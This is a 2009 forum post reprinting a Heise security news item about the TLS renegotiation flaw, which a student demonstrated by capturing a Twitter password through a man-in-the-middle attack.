Peaches Posted November 17, 2009 Report Share Posted November 17, 2009 16 November 2009, 12:57Password theft via vulnerability in SSL/TLS protocol The vulnerability in the design of the SSL/TLS protocol revealed earlier this month can apparently be used to carry out attacks in practice. On his blog, student Anil Kurmus reports that he was able to steal a Twitter password by using a man-in-the-middle attack. Until now it had been assumed that the problem was largely theoretical and would be made manifest only in very limited scenarios. The design weakness can be exploited by attackers to inject content into secure connections. In his attack, Kurmus appended a test victim's encrypted HTTPS request to his own Twitter request, effectively as a tweet. This does not allow the content of the packet to be viewed directly, but following decryption, the web server combines the two packets into one as a result of the TLS renegotiation vulnerability. In Kurmus' test, this resulted in the victim's HTTP request appearing as a tweet on Kurmus' Twitter account with the victim's user name and password visible in easily-decoded Base64 encoded form.Full story at Heise security - http://www.h-online....col-860435.html Quote Link to post Share on other sites
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.